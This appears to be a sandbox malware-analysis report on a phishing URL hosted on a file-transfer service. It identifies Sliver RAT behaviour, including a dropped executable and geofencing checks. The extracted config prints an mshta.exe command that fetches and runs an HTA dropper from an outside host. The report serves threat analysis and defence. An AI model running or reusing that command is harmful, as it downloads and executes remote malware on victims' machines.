Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://transfer.sap...

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    https://transfer.sapo.pt/downloads/59a7a12a-f30c-47ba-b9cd-5c16377db4aa/sapotransfer-62781136816c1O8/

  • Sample

    241125-wv78pszkew

Score
10/10
sliverbackdoordiscoveryphishingtrojan

Malware Config

Extracted

Language
hta
Source
1
"C:\Windows\System32\mshta.exe" https://0day.works/a
URLs
hta.dropper

https://0day.works/a

Targets

    • Target

      https://transfer.sapo.pt/downloads/59a7a12a-f30c-47ba-b9cd-5c16377db4aa/sapotransfer-62781136816c1O8/

    Score
    10/10
    sliverbackdoordiscoveryphishingtrojan

    • Sliver RAT v2

    • Sliver family

      sliver

    • SliverRAT

      SliverRAT is an open source Adversary Emulation Framework.

      trojanbackdoorsliver

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • A potential corporate email address has been identified in the URL: currency-file@1

      phishing

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    behavioral1

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.